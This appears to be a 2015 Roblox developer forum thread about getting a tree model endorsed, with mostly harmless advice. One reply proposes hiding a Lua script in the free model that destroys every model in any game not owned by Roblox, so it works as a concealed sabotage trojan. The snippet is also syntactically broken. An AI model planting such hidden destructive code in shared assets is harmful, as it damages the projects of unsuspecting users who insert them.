|
| 19 Aug 2015 07:09 PM |
| I really would like to have my tree model in my zoo endorsed, however I am afraid of just letting it go as a free model. How do I increase my chances of getting the tree endorsed by ROBLOX? Does sending a screenshot to a certain someone help? |
|
|
| Report Abuse |
|
|
|
| 19 Aug 2015 07:19 PM |
Um hide a script in your model saying:
if game.creatorId ~= 1 then function recurse(obj) for i, v in pairs(obj:GetChildren()) do if v:IsA("Model") or v.Name = "Insert name of parts here" then --Name all of your parts the same thing v:Destroy() else recurse(v) end end end end
This script will check if the creator has an id of 1, because ROBLOX's ID is 1. If it's not 1, then the script will search for any model in the game and destroy it, and if the creator ungrouped the model, then the second argument will see if it finds a name of a part in your model and will destroy it. It will keep going until it destroys them all! Simple regular script. Hide this in your tree model to protect it.
BEWARE! If you run this in your game it will delete your model because you don't have the ID of ROBLOX.
|
|
|
| Report Abuse |
|
|
|
| 19 Aug 2015 08:27 PM |
wtf ^
@OP: as you can see, all endorsed models are free models. making your model a free model won't decrease the chances of getting it endorsed..in fact, only models IN the library get endorsed. it just wouldn't make sense for them to mark your model as high quality if it was private. there's a group for this that I was looking at a few days ago but I can't remember what it was called. according to the people there, ROBLOX selects models to "endorse" in batches. so..just get your model popular. lots of takes, lots up thumbs up and favorites. i'd say that's your best chance. as long as it makes use of advanced principles, not basic scripting or low quality building. |
|
|
| Report Abuse |
|
|
|
| 19 Aug 2015 09:33 PM |
"only models IN the library get endorsed"
wrong |
|
|
| Report Abuse |
|
|
|
| 19 Aug 2015 09:39 PM |
| ok but why would private models get endorsed |
|
|
| Report Abuse |
|
|
|
| 20 Aug 2015 01:23 AM |
ahh nevermind, misread your post.
|
|
|
| Report Abuse |
|
|
|
| 20 Aug 2015 09:20 PM |
Yes, I know that the model has to go out to public if it gets endorsed. But what I am asking is how do I make sure it gets endorsed if I decide to make it a free model? I'm uncomfortable putting the model out if chances are too low of any admin checking it. Also what worries me is that there is already an endorsed tree of the same type I made (coniferous tree), though mine is higher quality
Also if you find the name of the group that would make my day! I shall search for them, too |
|
|
| Report Abuse |
|
|
|
| 20 Aug 2015 09:26 PM |
| It's no big deal. It's just a tree. There's no real way to *make sure* that it gets endorsed. Also, I looked for the group but couldn't really find it. Forgot who I saw that was in it. Sorry. |
|
|
| Report Abuse |
|
|
|
| 26 Aug 2016 05:44 PM |
ok
-skydude221, cringiest posts out there
-skydude221, cringiest posts out there |
|
|
| Report Abuse |
|
|